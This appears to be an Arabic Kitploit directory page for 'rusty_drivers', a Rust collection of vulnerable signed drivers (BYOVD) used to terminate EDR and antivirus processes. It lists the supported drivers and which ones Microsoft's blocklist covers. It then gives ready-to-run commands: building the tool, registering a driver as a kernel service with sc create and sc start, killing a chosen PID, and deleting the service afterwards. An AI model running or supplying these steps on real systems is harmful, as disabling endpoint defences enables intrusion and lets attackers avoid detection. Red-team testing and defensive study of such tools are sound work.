Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
rusty_drivers — BYOVD collection | Kitploit
أدوات/GitHubGitHub/florianib/rusty_drivers
ExploitationIDS/IPS EvasionPost-ExploitationRed TeamingAdversarial Attack
GitHubflorianib/rusty_drivers

rusty_drivers

BYOVD collection

عرض المستودع
246منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

RustyDrivers

هذا المشروع عبارة عن مجموعة BYOVD تركّز على إنهاء عمليات EDR / AV.

حاليًا، يتم دعم برامج التشغيل التالية:

برنامج التشغيلاسم الوسيطمحظور
Process Explorerprocess_explorerنعم
Genshin Impactgenshinنعم
Rentdrv2rentdrv2لا
TrueSighttruesightلا

"محظور" تعني أن برنامج التشغيل مدرج في قائمة الحظر من Microsoft ولا يمكن تشغيله على نظام Windows محدّث.

البناء

root@kitploit:~
cargo build --release

الاستخدام

root@kitploit:~
rusty_drivers.exe --help            
Usage: rusty_drivers.exe --pid <PID> --driver <DRIVER>

Options:
  -p, --pid <PID>
  -d, --driver <DRIVER>
  -h, --help             Print help
  -V, --version          Print version

مثال

بما أن الملف التنفيذي لا يسجّل خدمة لاستغلال برنامج التشغيل، يجب القيام بذلك يدويًا:

root@kitploit:~
sc create Test123 binpath= c:\test\<DRIVER>.sys type= kernel start= auto

بعد ذلك، يمكن بدء الخدمة:

root@kitploit:~
sc start Test123

أخيرًا، لإيقاف العملية ذات المعرف PID 1234 باستخدام برنامج تشغيل Process Explorer، يمكن استخدام الأمر التالي:

root@kitploit:~
rusty_drivers.exe --pid 1234 --driver process_explorer          

لا تنسَ تنظيف الخدمة بعد ذلك:

root@kitploit:~
sc stop Test123
sc delete Test123
تنزيل الأداة